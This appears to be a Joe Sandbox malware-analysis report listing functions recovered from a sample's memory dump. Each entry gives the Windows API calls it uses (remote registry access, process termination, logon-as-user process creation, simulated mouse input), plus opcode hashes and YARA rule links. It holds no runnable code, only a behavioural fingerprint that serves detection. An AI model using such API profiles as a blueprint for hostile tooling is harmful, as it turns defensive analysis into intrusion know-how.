Function 00C4046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00C410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C40038,?,?), ref: 00C410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C40548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C40588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C405AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C405D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C40617
RegCloseKey.ADVAPI32(00000000), ref: 00C40624

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: ba748ccae8cf1ea03cfd20222ca5210a723756d96a8b58f37a3915cd7b8ad904
Instruction ID: 63424219bfe57df4ef3f4e60851a32b5883f0a7f4e7feb435477c3702832c5d8
Opcode Fuzzy Hash: ba748ccae8cf1ea03cfd20222ca5210a723756d96a8b58f37a3915cd7b8ad904
Instruction Fuzzy Hash: FB517B31108240AFC710EF24C885EAFBBE8FF89314F14495DF996872A2DB31EA45DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C45A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C45A82
GetMenuItemCount.USER32(00000000), ref: 00C45AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C45AE1
GetMenuItemID.USER32(?,?), ref: 00C45B50
GetSubMenu.USER32(?,?), ref: 00C45B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00C45BAF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: c463eba6566689c7b07f6417053288b3b770fcfa297e881082f61efaa15a46cd
Instruction ID: 12a532a5cb75474a0146c1c390b29682d37c23971baa4f6609515d515e729e35
Opcode Fuzzy Hash: c463eba6566689c7b07f6417053288b3b770fcfa297e881082f61efaa15a46cd
Instruction Fuzzy Hash: 36516F35A00625EFDB11EFA5C845AAEB7F4FF48310F1044A9F815BB352CB70AE419B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C1F3F7
VariantClear.OLEAUT32(00000013), ref: 00C1F469
VariantClear.OLEAUT32(00000000), ref: 00C1F4C4
_memmove.LIBCMT ref: 00C1F4EE
VariantClear.OLEAUT32(?), ref: 00C1F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C1F569

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 751569adba497a9c7ca9fd5f0585147275c4e6a551f62790a069f16079d80db8
Instruction ID: 2f05641d3bdc59bfe617349a0a2a009c68b30c803c6cd1c8c022852410094de9
Opcode Fuzzy Hash: 751569adba497a9c7ca9fd5f0585147275c4e6a551f62790a069f16079d80db8
Instruction Fuzzy Hash: 545157B5A00209AFDB10CF58D884AAAB7F9FF4D314B15856DE959DB301D730EA52CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C226F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C22747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C22792
IsMenu.USER32(00000000), ref: 00C227B2
CreatePopupMenu.USER32 ref: 00C227E6
GetMenuItemCount.USER32(000000FF), ref: 00C22844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C22875

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: eb6068b1029ccc759d7d4f46fbd0050fbadc8bab613ae8c9ef72262bead3e128
Instruction ID: e7ca8217c133cd65998308c2bb4b2989f7d623edd7fe84d6209a1bb8a32c1c1f
Opcode Fuzzy Hash: eb6068b1029ccc759d7d4f46fbd0050fbadc8bab613ae8c9ef72262bead3e128
Instruction Fuzzy Hash: 3451AE71A00369FBDF24CF68E888BAEBBF4AF45314F104269E8219B6D1D770CA44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BC1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00BC179A
GetWindowRect.USER32(?,?), ref: 00BC17FE
ScreenToClient.USER32(?,?), ref: 00BC181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BC182C
EndPaint.USER32(?,?), ref: 00BC1876

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 71a1dbceb1a0c541f115d651de38023b62cb9ce76dbdc0874735436692f71609
Instruction ID: 609aa2aac070c7f5229de9f02293dfc44cf9ca9eda6f580e888aefdbb907a6dd
Opcode Fuzzy Hash: 71a1dbceb1a0c541f115d651de38023b62cb9ce76dbdc0874735436692f71609
Instruction Fuzzy Hash: 9D416D71504201AFD710DF28CC84FBA7BE8FB4A724F144AADFA95972A2C7319845DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C373B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00C35134,?,?,00000000,00000001), ref: 00C373BF

Part of subcall function 00C33C94: GetWindowRect.USER32(?,?), ref: 00C33CA7

GetDesktopWindow.USER32 ref: 00C373E9
GetWindowRect.USER32(00000000), ref: 00C373F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C37422

Part of subcall function 00C254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C2555E

GetCursorPos.USER32(?), ref: 00C3744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C374AC

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b8720eaae19c94ebb5e557ec3a1f3c856499247c65e7dbb219e6ac7dee3de990
Instruction ID: 509edb15e8a7929b902982223b1cf666d27e1f7ffb9cdb1459039e4e612907f1
Opcode Fuzzy Hash: b8720eaae19c94ebb5e557ec3a1f3c856499247c65e7dbb219e6ac7dee3de990
Instruction Fuzzy Hash: 3831F272508305ABD720DF14D849F9FBBA9FF89304F000A19F49897191C630EA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C18D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C185F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C18608
Part of subcall function 00C185F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C18612
Part of subcall function 00C185F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C18621
Part of subcall function 00C185F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C18628
Part of subcall function 00C185F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C1863E

GetLengthSid.ADVAPI32(?,00000000,00C18977), ref: 00C18DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C18DB8
HeapAlloc.KERNEL32(00000000), ref: 00C18DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00C18DD8
GetProcessHeap.KERNEL32(00000000,00000000,00C18977), ref: 00C18DEC
HeapFree.KERNEL32(00000000), ref: 00C18DF3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: ba5380b67dd76a480c12321079b50bbc0d427a4a16f760c942d3884226c4b4d1
Instruction ID: a6442758c163f8489645d2b7742eca866cc5db16d6f07089430f6071df956db5
Opcode Fuzzy Hash: ba5380b67dd76a480c12321079b50bbc0d427a4a16f760c942d3884226c4b4d1
Instruction Fuzzy Hash: 3811EE35900606FFDB10AFA4EC49BEE7BA9FF42315F10402DF84593250CB329A89EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C18AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C18B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00C18B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C18B40
CloseHandle.KERNEL32(00000004), ref: 00C18B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C18B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C18B8E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 4dfb8ebe684d9690e12389c06d6924a7a07b660c00ea7f694b6965c75b5e2151
Instruction ID: fcb76ee85e4e0db7b8ba929563354fb6b6db238f232e391a601a9a4262a213bb
Opcode Fuzzy Hash: 4dfb8ebe684d9690e12389c06d6924a7a07b660c00ea7f694b6965c75b5e2151
Instruction Fuzzy Hash: 9C115CB6504209ABDF118FA4ED49FDE7BA9FF4A314F044068FE04A2160C7758E65AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C4C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00BC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC134D
Part of subcall function 00BC12F3: SelectObject.GDI32(?,00000000), ref: 00BC135C
Part of subcall function 00BC12F3: BeginPath.GDI32(?), ref: 00BC1373
Part of subcall function 00BC12F3: SelectObject.GDI32(?,00000000), ref: 00BC139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C4C1C4
LineTo.GDI32(00000000,00000003,?), ref: 00C4C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C4C1E6
LineTo.GDI32(00000000,00000000,?), ref: 00C4C1F6
EndPath.GDI32(00000000), ref: 00C4C206
StrokePath.GDI32(00000000), ref: 00C4C216

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 8496d3f8d49641770ec082e50fd4c33ee05a2922fa6bc69c87471ee7983c5f6d
Instruction ID: b117805b83cb3ccb5eedc8ca47aca93d8ce47a4e3d6408d25b52c5ac0b55476c
Opcode Fuzzy Hash: 8496d3f8d49641770ec082e50fd4c33ee05a2922fa6bc69c87471ee7983c5f6d
Instruction Fuzzy Hash: 83111B7A40014CBFEF119F94DC88FAE7FADFB09354F048025BA189A1A1C7B19E55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BE03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00BE03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BE03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BE03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00BE03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BE0401

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: efaf6043bc9331b27e6ae5d8d8e8a61b5f8578ee4d8981e5161ab3b4f8107534
Instruction ID: 9829d7a59d40cef3fffefbee2e23cb85e9988208bed0977eeb657fffc48c5676
Opcode Fuzzy Hash: efaf6043bc9331b27e6ae5d8d8e8a61b5f8578ee4d8981e5161ab3b4f8107534
Instruction Fuzzy Hash: B60148B09027597DE3008F5A8C85B56FEA8FF19354F00411BA15847941C7B5A868CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00C2568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C2569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C256B1
GetWindowThreadProcessId.USER32(?,?), ref: 00C256C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C256CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C256D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C256E0

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 38cdf3a0e95b172e8dd780e34aed3c2a4aac42308c9ce26a7a06ce3e344b759e
Instruction ID: f6464cf00921d14f1b9c0dd57668370cbb180188d94d85a953aaba04924b9b4d
Opcode Fuzzy Hash: 38cdf3a0e95b172e8dd780e34aed3c2a4aac42308c9ce26a7a06ce3e344b759e
Instruction Fuzzy Hash: 06F01D36641158BBE7215BA2AC0DFEF7A7CFBC7B11F00016DFA04D106196A11A0286B5

Uniqueness

Uniqueness Score: -1.00%

Function 00C274D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C274E5
EnterCriticalSection.KERNEL32(?,?,00BD1044,?,?), ref: 00C274F6
TerminateThread.KERNEL32(00000000,000001F6,?,00BD1044,?,?), ref: 00C27503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BD1044,?,?), ref: 00C27510

Part of subcall function 00C26ED7: CloseHandle.KERNEL32(00000000,?,00C2751D,?,00BD1044,?,?), ref: 00C26EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00C27523
LeaveCriticalSection.KERNEL32(?,?,00BD1044,?,?), ref: 00C2752A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 89a77ecfd9e48f0831644c0135da9c72f938562c0f306356d0bde8aa44daa4f7
Instruction ID: d5cf617781fc4b90ddd47f319ddcd88b9b7b53be3f788094959ecefab8a15b26
Opcode Fuzzy Hash: 89a77ecfd9e48f0831644c0135da9c72f938562c0f306356d0bde8aa44daa4f7
Instruction Fuzzy Hash: 4AF0543E540612EBE7211B64FC8CBDF7769FF46302B000535F102914B1CBB55902CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C18E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C18E7F
UnloadUserProfile.USERENV(?,?), ref: 00C18E8B
CloseHandle.KERNEL32(?), ref: 00C18E94
CloseHandle.KERNEL32(?), ref: 00C18E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00C18EA5
HeapFree.KERNEL32(00000000), ref: 00C18EAC

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f66d5c506a8e8cf3b58264b13c60e80850ee8c6c1c26f258378fc94e5c03ef4f
Instruction ID: 2959ec77d237cef1798e0cd7cb7b8b05b8089c7ea6a786a62965060cbffe3acf
Opcode Fuzzy Hash: f66d5c506a8e8cf3b58264b13c60e80850ee8c6c1c26f258378fc94e5c03ef4f
Instruction Fuzzy Hash: EEE0527A104505FBDA021FE5EC0CB5EBBA9FB8A762B508639F21981470CB329462DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C38902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C38928
CharUpperBuffW.USER32(?,?), ref: 00C38A37
VariantClear.OLEAUT32(?), ref: 00C38BAF

Part of subcall function 00C27804: VariantInit.OLEAUT32(00000000), ref: 00C27844
Part of subcall function 00C27804: VariantCopy.OLEAUT32(00000000,?), ref: 00C2784D
Part of subcall function 00C27804: VariantClear.OLEAUT32(00000000), ref: 00C27859

Strings

Incorrect Parameter format, xrefs: 00C38960, 00C38B22
AUTOIT.ERROR, xrefs: 00C38A3D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 41919ffd9eadaab941a08ae8800381b2c30f63587a8e7a261e5b979d32e758a7
Instruction ID: fedb7fc8c1fd6a239aadaba5e5e8bf45e8b0b76d69973875baa5e722ec393023
Opcode Fuzzy Hash: 41919ffd9eadaab941a08ae8800381b2c30f63587a8e7a261e5b979d32e758a7
Instruction Fuzzy Hash: 24919E71608302DFC710DF25C485E5ABBE4EF89714F14896EF89A8B361DB30E949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C22F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDFEC6: _wcscpy.LIBCMT ref: 00BDFEE9

_memset.LIBCMT ref: 00C23077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C230A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C23159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C23187

Strings

0, xrefs: 00C23063

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 6ceda9c36c2555059cb200122a677aa2699eeb84e5a5b6e20c020e7a5b178eb0
Instruction ID: 851bbe7f2b1f69ca38eb08ea3417ed3d4cfb59c6a4c0d5d4c2533d0704aa27ef
Opcode Fuzzy Hash: 6ceda9c36c2555059cb200122a677aa2699eeb84e5a5b6e20c020e7a5b178eb0
Instruction Fuzzy Hash: 3251CF316083A09AD725DF28E845B6FB7E4EF85310F04092DF8A5D25E1DB78CF548766

Uniqueness

Uniqueness Score: -1.00%

